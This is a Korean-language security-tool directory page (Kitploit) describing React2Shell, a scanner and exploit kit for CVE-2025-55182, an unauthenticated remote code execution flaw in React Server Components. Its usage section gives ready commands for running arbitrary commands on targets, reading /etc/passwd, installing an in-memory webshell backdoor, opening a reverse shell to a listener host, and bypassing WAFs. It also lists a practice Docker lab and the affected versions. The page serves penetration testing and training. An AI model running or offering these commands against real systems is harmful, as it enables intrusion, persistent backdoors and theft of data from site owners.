Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell — CVE-2025-55182 보안 테스트 키트: CLI 스캐너 + Chrome 확장 프로그램 + Nuclei 템플릿 + Docker 랩. | Kitploit
도구/GitHubGitHub/sho-luv/react2shell
Vulnerability ScannersExploit FrameworksWeb Application ExploitationWAF BypassWeb SecurityCTFPenetration TestingLearning & EducationPayload DevelopmentLabs & Practice
GitHubsho-luv/react2shell

React2Shell

928개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 보안 테스트 키트: CLI 스캐너 + Chrome 확장 프로그램 + Nuclei 템플릿 + Docker 랩.

저장소 보기

React2Shell

CVE-2025-55182 스캐너 및 익스플로잇 툴킷 for Next.js/React 서버 컴포넌트 RCE.

저장소 구조

root@kitploit:~
React2Shell/
├── browser-extension/    # 브라우저 기반 탐지를 위한 Chrome 확장 프로그램
│   ├── manifest.json
│   ├── content.js
│   ├── popup.html/js
│   └── background.js
├── cli/                  # 명령줄 스캐너 및 익스플로잇 도구
│   ├── react2shell.py
│   └── requirements.txt
├── docs/                 # 학습 중심 문서
│   ├── README.md         # 학습 경로 인덱스
│   ├── 01-fundamentals.md
│   ├── 02-vulnerability.md
│   ├── 03-exploitation.md
│   ├── 04-frameworks.md
│   └── 05-defense.md
├── lab/                  # 테스트용 Docker 실습 환경
│   ├── vulnerable/       # 취약한 Next.js 앱 (React 19.2.0)
│   ├── patched/          # 패치된 Next.js 앱 (React 19.2.1)
│   ├── waf/              # ModSecurity WAF 컨테이너
│   ├── waku-app/         # 취약한 Waku 앱 (React 19.2.0)
│   ├── react-router-app/ # 취약한 React Router 앱 (React 19.2.0)
│   └── docker-compose.yml
└── nuclei/               # Nuclei 템플릿
    ├── CVE-2025-55182.yaml       # RCE 탐지 (코드 실행)
    └── CVE-2025-55182-safe.yaml  # 안전한 사이드 채널 탐지

빠른 시작

CLI 도구

root@kitploit:~
cd cli
pip install -r requirements.txt

# 대상 스캔
python react2shell.py https://target.com

# 명령 실행
python react2shell.py https://target.com -c "id"

# 대화형 셸
python react2shell.py https://target.com -i

브라우저 확장 프로그램

  1. chrome://extensions/ 열기
  2. "개발자 모드" 활성화
  3. "로드되지 않은 확장 프로그램 로드" 클릭
  4. browser-extension 디렉터리 선택

실습 환경

root@kitploit:~
cd lab
docker-compose up -d

# 공격 가능 대상:
# Next.js 취약:      http://localhost:3011  ← 전체 RCE
# Waku 취약:         http://localhost:3014  ← RCE (블라인드 - HTTP 출력 없음)
# React Router:      http://localhost:3015  ← 전체 RCE (ESM)

# 보호 대상:
# Next.js 패치됨:    http://localhost:3012  ← 안전
# WAF 보호:          http://localhost:3013  ← ModSecurity가 익스플로잇 차단

Nuclei 스캐너

root@kitploit:~
nuclei -t nuclei/CVE-2025-55182.yaml -u https://target.com

기능

CLI 도구 (cli/react2shell.py)

  • 멀티 프레임워크 지원 - Next.js, Waku, React Router, Expo, Vite RSC, Parcel RSC
  • 프레임워크 탐지 (--detect) - 대상 프레임워크 자동 탐지
  • 엔드포인트 열거 (-E) - RSC 엔드포인트 자동 발견
  • 취약점 스캔 - 단일 URL 또는 파일에서 배치 스캔
  • 명령 실행 (-c) - 임의 명령 실행
  • 대화형 셸 (-i) - 지속적인 명령 세션
  • 리버스 셸 (-r) - 다양한 유형: nc, bash, perl, python, ruby
  • 인메모리 웹셸 (--webshell) - 지속적인 백도어 설치
  • 파일 읽기 (-f) - 원격 파일 직접 읽기
  • 로컬 스캔 (-L) - package.json에서 취약한 버전 확인
  • WAF 우회 - 정크 패딩 (-w), 유니코드 인코딩 (-u), Vercel 전용 (-V)
  • 프록시 지원 (-x) - Burp Suite 또는 다른 프록시를 통한 라우팅

브라우저 확장 프로그램 (browser-extension/)

  • RSC 취약점 지표 자동 탐지
  • 설정 가능한 익스플로잇 경로
  • 출력 표시와 함께 명령 실행
  • 활성화/비활성화 토글
  • 시각적 취약/안전 표시기

실습 환경 (lab/)

  • 취약한 Next.js (3011) - X-Action-Redirect를 통한 출력과 전체 RCE
  • Waku (3014) - RCE 확인됨, /RSC/F/{x}/{y}.txt 경로 형식 필요
  • React Router (3015) - ESM 호환 process.getBuiltinModule()을 사용한 전체 RCE
  • 패치된 Next.js (3012) - 익스플로잇 없이 탐지 테스트용
  • WAF 보호 (3013) - 우회 연구를 위한 ModSecurity 규칙
  • 대시보드 (8080) - 공격 로깅 및 시각화

CLI 사용 예제

root@kitploit:~
# 기본 스캔 (프레임워크 자동 탐지)
python react2shell.py https://target.com

# 프레임워크 탐지 및 엔드포인트 열거
python react2shell.py https://target.com --detect
python react2shell.py https://target.com -E -v

# 다른 프레임워크에서 명령 실행
python react2shell.py https://target.com -c "id"                    # Next.js (자동)
python react2shell.py https://target.com -F waku -c "id"            # Waku (블라인드 RCE)
python react2shell.py https://target.com -F react-router -c "id"    # React Router (ESM)

# 출력이 있는 실습 예제
python react2shell.py http://localhost:3011 -c "cat /app/secret/flag.txt"  # Next.js
python react2shell.py http://localhost:3015 -F react-router -c "id"        # React Router

# 모든 WAF 우회와 함께 명령 실행
python react2shell.py https://target.com -c "cat /etc/passwd" -w -u

# 프록시를 통한 대화형 셸
python react2shell.py https://target.com -i -x http://127.0.0.1:8080

# 인메모리 웹셸 설치 (1337 포트에 백도어 생성)
python react2shell.py https://target.com --webshell mypassword
# 접속: curl 'http://target:1337/?p=mypassword&cmd=id'

# 리버스 셸
python react2shell.py https://target.com -r -l 10.0.0.1 -p 4444 -S bash

# 로컬 프로젝트에서 취약한 버전 스캔
python react2shell.py -L /path/to/project

# 출력과 함께 배치 스캔
python react2shell.py targets.txt -t 20 -o results.json -v

모든 CLI 옵션

root@kitploit:~
실행 옵션:
  -c, --cmd             실행할 명령
  -i, --interactive     대화형 셸 세션
  -r, --reverse         리버스 셸 모드
  -l, --lhost           리스너 호스트
  -p, --lport           리스너 포트
  -S, --shell-type      셸 유형 (nc, nc-mkfifo, bash, perl, python, ruby)
  -f, --read-file       원격 파일 읽기

스캔 옵션:
  -P, --path            테스트할 경로 (쉼표로 구분 또는 파일)
  -t, --threads         스레드 수 (기본값: 10)
  -T, --timeout         요청 제한 시간(초) (기본값: 10)
  -s, --safe            안전 모드 (코드 실행 없음)
  -L, --local           로컬 프로젝트 디렉터리 스캔
  -F, --framework       대상 프레임워크 (auto, nextjs, waku, react-router, expo)
  -E, --enumerate       익스플로잇 전 RSC 엔드포인트 열거
  --detect              프레임워크만 탐지하고 엔드포인트 나열
  --webshell            1337 포트에 인메모리 웹셸 설치
  --rce                 RCE 개념 증명 모드 (기본값: 안전 모드)

우회 옵션:
  -w, --waf-bypass      정크 데이터 패딩
  -W, --waf-size        정크 크기(KB) (기본값: 128)
  -u, --unicode         유니코드 인코딩 우회
  -V, --vercel-bypass   Vercel 전용 우회
  --windows             Windows PowerShell 페이로드

요청 옵션:
  -x, --proxy           프록시 URL (예: http://127.0.0.1:8080)
  -H, --header          사용자 정의 헤더
  -A, --user-agent      사용자 정의 User-Agent
  -k, --insecure        SSL 검증 비활성화

출력 옵션:
  -o, --output          결과를 JSON으로 저장
  -v, --verbose         버전 탐지와 함께 자세한 출력
  -q, --quiet           취약한 대상만 표시
  --no-color            색상 비활성화
  --no-banner           배너 숨기기

CVE-2025-55182 세부 정보

필드값
CVSS10.0 (심각)
영향인증되지 않은 원격 코드 실행
영향받는 대상취약한 React 버전을 사용하는 모든 RSC 프레임워크

영향받는 프레임워크

크레딧

  • mrknow001/RSC_Detector
  • assetnote/react2shell-scanner
  • Chocapikk/CVE-2025-55182
  • hackersatyamrastogi/react2shell-ultimate
  • ProjectDiscovery Nuclei 템플릿

면책 조항

이 툴킷은 허가된 보안 테스트 전용입니다. 소유하고 있거나 명시적인 서면 허가를 받은 시스템에서만 사용하십시오. 컴퓨터 시스템에 대한 무단 액세스는 불법입니다.


CVE-2025-55182 | CVSS 10.0 | 허가된 보안 테스트 전용

도구 다운로드
  • 안전 모드 (-s) - 코드 실행 없는 사이드 채널 탐지
  • 매커니즘
    React Flight 프로토콜을 통한 프로토타입 오염
    프레임워크취약한 버전패치된 버전
    React19.0.0 - 19.2.019.2.1+
    Next.js14.0.0 - 15.4.715.4.8+
    Waku< 0.27.20.27.2+
    React Router7.0.0 - 7.5.0 (RSC 미리보기)7.5.1+
    Expo실험적 RSCReact 업데이트
    @vitejs/plugin-rsc취약한 React를 사용하는 모든 버전React 업데이트
    @parcel/rsc취약한 React를 사용하는 모든 버전React 업데이트
    RedwoodJS (rwsdk)취약한 React를 사용하는 모든 버전React 업데이트